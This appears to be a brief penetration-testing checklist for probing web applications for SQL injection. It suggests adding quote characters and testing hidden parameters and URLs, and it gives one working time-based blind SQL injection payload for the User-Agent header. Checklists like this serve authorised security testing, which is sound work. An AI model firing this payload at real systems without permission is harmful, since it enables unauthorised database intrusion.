Find hidden parameters
Add ' or "
'XOR(if(now()=sysdate(),sleep(5*5),0))OR' (sleep for 25 seconds) (User-Agent)
Test all parameters just like xss
Test sql injection in url